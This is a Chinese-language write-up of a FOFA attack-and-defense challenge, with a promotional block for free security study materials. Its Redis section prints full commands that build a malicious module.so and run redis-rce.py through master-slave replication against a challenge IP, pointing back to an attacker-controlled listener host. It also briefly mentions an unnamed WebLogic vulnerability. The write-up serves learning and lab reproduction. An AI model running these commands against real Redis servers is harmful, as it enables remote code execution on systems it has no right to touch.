FOFA-攻防挑战

记录一下中途短暂的辉煌时刻
辉煌一刻谁都有,别拿一刻当永久
在昨天初尝战果之后,今天又习惯性的打开发现今天还有挑战赛,按捺不住躁动的心,又开始了学习 。今天主要拿下的是这四个镜像,同时我也会对我了解的漏洞详情做一个具体的分析
我们看到了对应的端口有 7001
看到熟悉的界面以及之前察觉的端口信息,感觉有可能是,加上路径查看一下,是10.3.6.0
存在的漏洞太多了,所以我们直接上漏洞扫描工具
看到了漏洞对应的编号,以及存在的回显链路
信息泄露
打开界面就是一个
尝试了扫路径,查漏洞的操作无果后,于是直接在页面上查找关键词flag
轻易就查询到了 flag 的值,这个题目给 5 分 我是没有想到的
【----帮助网安学习,以下所有学习资料免费领!加weix:,备注“ csdn ”获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库

FOFA-攻防挑战

文章插图
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
Redis 未授权访问漏洞
一看对应映射的端口是 6379 立马就联想到了 Redis,同时这个端口无法从 web 端进行访问,所以基本可以肯定是 Redis 了
注意到版本是 4.0.14
针对于 Redis 未授权访问漏洞,有以下利用方法
这里我们选用 主从复制漏洞来获取shell
在服务器上操作(今天借到了服务器)
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.gitcd RedisModules-ExecuteCommand/make# 生成 /RedisModules-ExecuteCommand/src/module.socd ..git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/cp ../RedisModules-ExecuteCommand/src/module.so ./pip install -r requirements.txtpython redis-rce.py-r 123.58.236.76 -p 57119 -L 43.142.138.251 -f module.so
利用主从复制获取shell
Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库 。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受 。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式 。
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的 。
Linux
在本机上弄的时候出现各种各样的奇葩的问题,给我整破防了,最后我采用了来进行复现 。复现不同的利用都删掉,重启继续进行 。最后发现主从复制的利用版本是 4.x-5.x,从 6.0开始,就无法利用成功,写入exp.so 也是可以的,加载时会失败,提示没有权限,给 exp.so 权限后时可以的 。
【FOFA-攻防挑战】sudo docker pull vertigo/redis4sudo docker run -p 6379:6379 vertigo/redis4
redis-rce
生成恶意.so文件,下载-使用make编译即可生成
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.gitcd RedisModules-ExecuteCommand/make# 生成 /RedisModules-ExecuteCommand/src/module.socd ..git clone https://github.com/Ridter/redis-rce.gitcd redis-rce/cp ../RedisModules-ExecuteCommand/src/module.so ./pip install -r requirements.txtpython redis-rce.py -r 192.168.10.187 -p 6379 -L 192.168.10.1 -f module.so